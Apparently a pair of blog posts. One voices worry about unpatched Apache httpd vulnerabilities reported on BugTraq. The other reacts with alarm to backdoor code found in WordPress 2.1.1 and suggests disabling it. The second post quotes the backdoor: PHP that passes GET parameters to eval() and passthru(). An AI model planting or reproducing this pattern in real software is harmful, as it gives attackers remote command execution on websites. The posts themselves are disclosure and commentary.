I am not able to sleep well if I do not take at least a cursory look at BugTraq before bed.
I just literally stumbled upon this: Apache httpd vulenrabilities (sic)
What worries me has not so much to do with the vulnerabilities themselves, rather than with the accompanying note:
The information on the vulnerabilities above was sent to Apache Software Foundation on 16 May, 2006. For over 1 year no official patch has been issued.
People like myself often point at Apache as an example of Free Software’s excellence, especially where security is concerned. So, assuming that the threats are real, is this possible, I am wondering?
I will definitely keep my eyes on this thread. Meanwhile, I am not going to sleep well tonight. 
What is this shit? A joke? It’s not funny!
// from wp-includes/feed.php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
// [...]
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
// from wp-includes/theme.php
function get_theme_mcommand($mcds) {
passthru($mcds);
}
// [...]
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
I’m speechless.
Why do we always have to wait for things like these to happen before we take even the most basic security measures!
I’m aware that this is a complicated matter, but we can’t just take chances like that!!!! Or can we?
I love WordPress, but this is just too big. I am also wondering why the message on wordpress.org didn’t mention what seems to me like a quick patch, that is commenting the two if statements above (wp-includes/feed.php, line 149; wp-includes/theme.php, line 441; at least on my 2.1.1 installation).
Let’s see the official advisories. Why aren’t there any yet? A message from BugTraq is all I could find.
Quick, go fix it!!!
cat >/dev/null is 
